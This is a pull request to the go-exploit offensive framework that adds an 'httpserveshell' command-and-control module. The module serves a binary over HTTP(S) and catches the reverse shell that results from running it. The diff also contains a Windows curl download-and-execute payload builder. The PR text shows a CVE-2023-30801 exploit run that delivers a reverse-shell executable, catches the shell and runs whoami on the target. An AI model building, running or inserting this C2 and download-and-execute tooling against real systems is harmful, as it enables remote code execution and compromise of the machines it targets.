### PR TITLE
Added httpserveshell c2

### DIFF
--- a/c2/factory.go
+++ b/c2/factory.go
@@ -2,6 +2,7 @@ package c2
 
 import (
 	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
+	"github.com/vulncheck-oss/go-exploit/c2/httpserveshell"
 	"github.com/vulncheck-oss/go-exploit/c2/simpleshell"
 	"github.com/vulncheck-oss/go-exploit/c2/sslshell"
 	"github.com/vulncheck-oss/go-exploit/output"
@@ -21,6 +22,7 @@ const (
 	SimpleShellClient Impl = 1
 	SSLShellServer    Impl = 2
 	HTTPServeFile     Impl = 3
+	HTTPServeShell    Impl = 4
 )
 
 var names = [...]string{
@@ -28,6 +30,7 @@ var names = [...]string{
 	"SimpleShellClient",
 	"SSLShellServer",
 	"HTTPServeFile",
+	"HTTPServeShell",
 }
 
 // factory pattern for creating c2 interfaces. Note that this is
@@ -43,6 +46,8 @@ func GetInstance(c2Impl Impl) (Interface, bool) {
 		return sslshell.GetInstance(), true
 	case HTTPServeFile:
 		return httpservefile.GetInstance(), true
+	case HTTPServeShell:
+		return httpserveshell.GetInstance(), true
 	default:
 		output.PrintFrameworkError("Invalid C2 Server")
 	}
@@ -61,6 +66,8 @@ func CreateFlags(c2Impl Impl) {
 		sslshell.GetInstance().CreateFlags()
 	case HTTPServeFile:
 		httpservefile.GetInstance().CreateFlags()
+	case HTTPServeShell:
+		httpserveshell.GetInstance().CreateFlags()
 	default:
 		output.PrintFrameworkError("Invalid C2 Server")
 	}

--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -37,6 +37,8 @@ type Server struct {
 	PrivateKeyFile string
 	// The file path to the user provided certificate (if provided)
 	CertificateFile string
+	// Loaded certificate
+	Certificate tls.Certificate
 }
 
 var singleton *Server
@@ -87,6 +89,25 @@ func (httpServer *Server) Init(rhostAddr string, rhostPort int, isClient bool) b
 	// the server will only respond 200 if this filename is requested
 	httpServer.FileName = random.RandLetters(12)
 
+	if httpServer.TLS {
+		var ok bool
+		var err error
+		if len(httpServer.CertificateFile) != 0 && len(httpServer.PrivateKeyFile) != 0 {
+			httpServer.Certificate, err = tls.LoadX509KeyPair(httpServer.CertificateFile, httpServer.PrivateKeyFile)
+			if err != nil {
+				output.PrintfFrameworkError("Error loading certificate: %s", err.Error())
+
+				return false
+			}
+		} else {
+			output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
+			httpServer.Certificate, ok = encryption.GenerateCertificate()
+			if !ok {
+				return false
+			}
+		}
+	}
+
 	return true
 }
 
@@ -103,32 +124,12 @@ func (httpServer *Server) Run(timeout int) {
 		}
 	})
 
-	var certificate tls.Certificate
-	if httpServer.TLS {
-		var ok bool
-		var err error
-		if len(httpServer.CertificateFile) != 0 && len(httpServer.PrivateKeyFile) != 0 {
-			certificate, err = tls.LoadX509KeyPair(httpServer.CertificateFile, httpServer.PrivateKeyFile)
-			if err != nil {
-				output.PrintfFrameworkError("Error loading certificate: %s", err.Error())
-
-				return
-			}
-		} else {
-			output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
-			certificate, ok = encryption.GenerateCertificate()
-			if !ok {
-				return
-			}
-		}
-	}
-
 	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
 	go func() {
 		if httpServer.TLS {
 			output.PrintfFrameworkStatus("Starting an HTTPS server on %s", connectionString)
 			tlsConfig := &tls.Config{
-				Certificates: []tls.Certificate{certificate},
+				Certificates: []tls.Certificate{httpServer.Certificate},
 				// We have no control over the SSL versions supported on the remote target. Be permissive for more targets.
 				MinVersion: tls.VersionSSL30,
 			}

--- a/c2/httpserveshell/httpserveshell.go
+++ b/c2/httpserveshell/httpserveshell.go
@@ -1,0 +1,88 @@
+package httpserveshell
+
+import (
+	"flag"
+	"sync"
+
+	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
+	"github.com/vulncheck-oss/go-exploit/c2/simpleshell"
+	"github.com/vulncheck-oss/go-exploit/c2/sslshell"
+	"github.com/vulncheck-oss/go-exploit/output"
+)
+
+type Server struct {
+	// Indicates if we should use SSLShell or SimpleShell
+	SSLShell bool
+	// The HTTP address to bind to
+	HTTPAddr string
+	// The HTTP port to bind to
+	HTTPPort int
+}
+
+var singleton *Server
+
+// A basic singleton interface for the c2.
+func GetInstance() *Server {
+	if singleton == nil {
+		singleton = new(Server)
+	}
+
+	return singleton
+}
+
+// User options for serving a file over HTTP as the "c2".
+func (serveShell *Server) CreateFlags() {
+	flag.BoolVar(&serveShell.SSLShell, "httpServeShell.SSLShell", true, "Indicates if the SSLShell or SimpleShell is used")
+
+	// normal "httpservefile" uses lhost,lport for binding so we need to create new vars for that
+	flag.StringVar(&serveShell.HTTPAddr, "httpServeFile.BindAddr", "", "The address to bind the HTTP serve to")
+	flag.IntVar(&serveShell.HTTPPort, "httpServeFile.BindPort", 8080, "The port to bind the HTTP serve to")
+
+	httpservefile.GetInstance().CreateFlags()
+	sslshell.GetInstance().CreateFlags()
+}
+
+// load the provided file into memory. Generate the random filename.
+func (serveShell *Server) Init(rhost string, rport int, isClient bool) bool {
+	if len(serveShell.HTTPAddr) == 0 {
+		output.PrintFrameworkError("User must specify -httpServeFile.BindAddr")
+
+		return false
+	}
+
+	if !httpservefile.GetInstance().Init(serveShell.HTTPAddr, serveShell.HTTPPort, isClient) {
+		return false
+	}
+
+	if serveShell.SSLShell {
+		return sslshell.GetInstance().Init(rhost, rport, isClient)
+	}
+
+	return simpleshell.GetServerInstance().Init(rhost, rport, isClient)
+}
+
+// start the http server and shell and wait for them to exit.
+func (serveShell *Server) Run(timeout int) {
+	var wg sync.WaitGroup
+
+	// Spin up the shell
+	wg.Add(1)
+	go func() {
+		defer wg.Done()
+		if serveShell.SSLShell {
+			sslshell.GetInstance().Run(timeout)
+		} else {
+			simpleshell.GetServerInstance().Run(timeout)
+		}
+	}()
+
+	// Spin up the http server
+	wg.Add(1)
+	go func() {
+		defer wg.Done()
+		httpservefile.GetInstance().Run(timeout)
+	}()
+
+	// wait until the go routines are clean up
+	wg.Wait()
+}

--- a/c2/httpserveshell/httpserveshell.go
+++ b/c2/httpserveshell/httpserveshell.go
@@ -1,3 +1,33 @@
+// HTTPServeShell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer).
+// The use case is when you want to drop/execute a custom binary, but you still want to catch it in
+// go-exploit. Example usage:
+//
+//		albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64
+//	 		-e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134
+//	 		-httpServeShell.SSLShell=false -httpServeFile.FileToServe ./build/reverse_shell_windows-amd64.exe
+//	 		-httpServeFile.TLS=true
+//		time=2023-09-08T11:07:20.852-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-amd64.exe"
+//		time=2023-09-08T11:07:20.856-04:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
+//		time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting listener on 10.9.49.134:1270"
+//		time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.133 port=8080 ssl=false "ssl auto"=false
+//		time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting an HTTPS server on 10.9.49.134:8080"
+//		time=2023-09-08T11:07:21.092-04:00 level=STATUS msg="Using session: SID=rIOk9SAl5TXTqIfpVGmYUn/kB+VuMrqo"
+//		time=2023-09-08T11:07:21.095-04:00 level=STATUS msg="Selecting a Windows payload"
+//		time=2023-09-08T11:07:21.309-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.133:51706"
+//		time=2023-09-08T11:07:21.309-04:00 level=STATUS msg="Active shell from 10.9.49.133:51706"
+//		time=2023-09-08T11:07:23.180-04:00 level=STATUS msg="Exploit successfully completed"
+//		whoami
+//		albinolobst9bd8\albinolobster
+//
+// From the exploit code, interacting with the variables isn't too much different from using httpServeFile
+// (since httpServeShell is just a wrapper):
+//
+//	 downAndExec := payload.WindowsCurlHTTPDownloadAndExecute(
+//			httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort,
+//			httpservefile.GetInstance().TLS, httpservefile.GetInstance().FileName)
+//
+// Which means anything that supports httpServeShell should also trivially support httpServeFile (and the other way around
+// as long as you are accounting for httpServeFile.SSLShell).
 package httpserveshell
 
 import (

--- a/payload/download.go
+++ b/payload/download.go
@@ -25,5 +25,6 @@ func WindowsCurlHTTPDownloadAndExecute(lhost string, lport int, ssl bool, downlo
 	if ssl {
 		return fmt.Sprintf("curl.exe -kso %s https://%s:%d/%s && %s & del /f %s", output, lhost, lport, downloadFile, output, output)
 	}
+
 	return fmt.Sprintf("curl.exe -so %s http://%s:%d/%s && %s & del /f %s", output, lhost, lport, downloadFile, output, output)
 }


### PR DESCRIPTION
HTTPServeShell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer). The use case is when you want to drop/execute a custom binary, but you still want to catch it in go-exploit. Example usage:

```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134 -httpServeShell.SSLShell=false -httpServeFile.FileToServe ./build/reverse_shell_windows-amd64.exe -httpServeFile.TLS=true
time=2023-09-08T11:07:20.852-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-amd64.exe"
time=2023-09-08T11:07:20.856-04:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting listener on 10.9.49.134:1270"
time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.133 port=8080 ssl=false "ssl auto"=false
time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting an HTTPS server on 10.9.49.134:8080"
time=2023-09-08T11:07:21.092-04:00 level=STATUS msg="Using session: SID=rIOk9SAl5TXTqIfpVGmYUn/kB+VuMrqo"
time=2023-09-08T11:07:21.095-04:00 level=STATUS msg="Selecting a Windows payload"
time=2023-09-08T11:07:21.309-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.133:51706"
time=2023-09-08T11:07:21.309-04:00 level=STATUS msg="Active shell from 10.9.49.133:51706"
time=2023-09-08T11:07:23.180-04:00 level=STATUS msg="Exploit successfully completed"
whoami
albinolobst9bd8\albinolobster
```

From the exploit code, interacting with the variables isn't too much different from using httpServeFile (since httpServeShell is just a wrapper):

```go
downAndExec := payload.WindowsCurlHTTPDownloadAndExecute(
    httpservefile.GetInstance().HTTPAddr, httpservefile.GetInstance().HTTPPort,
    httpservefile.GetInstance().TLS, httpservefile.GetInstance().FileName)
```

Which means anything that supports httpServeShell should also trivially support httpServeFile (and the other way around as long as you are accounting for httpServeFile.SSLShell).